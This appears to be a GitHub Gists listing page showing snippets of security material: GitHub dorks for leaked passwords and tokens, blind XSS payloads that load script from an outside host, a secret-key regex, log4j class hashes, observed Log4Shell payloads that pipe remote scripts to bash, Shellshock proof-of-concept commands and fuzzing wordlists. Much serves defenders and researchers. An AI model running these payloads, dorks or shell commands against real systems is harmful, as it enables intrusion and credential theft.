This list is no longer updated, thus the information is no longer reliable.
You can see the latest version (from october 2022) here
th3g3ntl3m4n th3g3ntl3m4n84
jhaddix
/ Github Dorks
Created
January 28, 2023 00:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q="hackertarget.site"+password&type=Code" | |
| echo "https://github.com/search?q=""hackertarget""+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |
Huntinex
/ bxss-payload.txt
Created
August 1, 2022 13:40
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "><script src=https://username.xss.ht></script> | |
| '><script src=https://username.xss.ht></script> | |
| ";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)') |
h4x0r-dz
/ Generic keys
Created
May 5, 2022 09:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
olliencc
/ log4j2-class-md5sum.txt
Last active
November 30, 2025 03:47
log4j2 CVE-2021-44228 patched three class files - https://gitbox.apache.org/repos/asf?p=logging-log4j2.git;h=c77b3cb - below are the inner class files (i.e. not jar) for each release to help locate vulnerable versions. Note: 2.0.15 was the patched version and is not vulnerable.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 04fdd701809d17465c17c7e603b1b202 ./2.11.0/apache-log4j-2.11.0-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 415c13e7c8505fb056d540eac29b72fa ./2.8/apache-log4j-2.8-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 415c13e7c8505fb056d540eac29b72fa ./2.8.1/apache-log4j-2.8.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 04fdd701809d17465c17c7e603b1b202 ./2.9.0/apache-log4j-2.9.0-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 8b2260b1cce64144f6310876f94b1638 ./2.4.1/apache-log4j-2.4.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| a193703904a3f18fb3c90a877eb5c8a7 ./2.8.2/apache-log4j-2.8.2-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 3bd9f41b89ce4fe8ccbf73e43195a5ce ./2.6.1/apache-log4j-2.6.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 04fdd701809d17465c17c7e603b1b202 ./2.11.2/apache-log4j-2.11.2-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
| 21f055b62c15453f0d7970a9d994cab7 ./2.13.0/apache-log4j-2.13.0-bin/org/apache/logging/lo |
blotus
/ log4j_exploitation_attempts_crowdsec.md
Last active
December 29, 2023 12:24
IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community
SwitHak
/ 20211210-TLP-WHITE_LOG4J.md
Last active
March 11, 2026 09:27
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC
Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)
- If you want to add a link, comment or send it to me
- Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak
- Royce Williams list sorted by vendors responses Royce List
- Very detailed list NCSC-NL
- The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| b64decoded | hits | |
|---|---|---|
| (curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash | 2056 | |
| (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash | 162 | |
| (curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash | 2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Shellshock PoC | |
| env x='() { :;}; echo vulnerable' bash -c "echo this is a test" | |
| # executing arbitrary commands by exploiting SSH via shellshock | |
| ssh user@192.168.0.1 '() { :;}; whoami' | |
| # spwan bash shell by exploiting SSH via shellshock | |
| ssh user@192.168.0.1 '() { :;}; /bin/bash' | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env zsh | |
| # reference | |
| # https://wordlists.assetnote.io/ | |
| # https://github.com/danielmiessler/SecLists/ | |
| # https://github.com/fuzzdb-project/fuzzdb | |
| BASE=( | |
| 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt' | |
| 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Common-DB-Backups.txt' | |
| 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Logins.fuzz.txt' |
yassineaboukir
/ List of API endpoints & objects
Last active
February 9, 2026 20:44
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
NewerOlder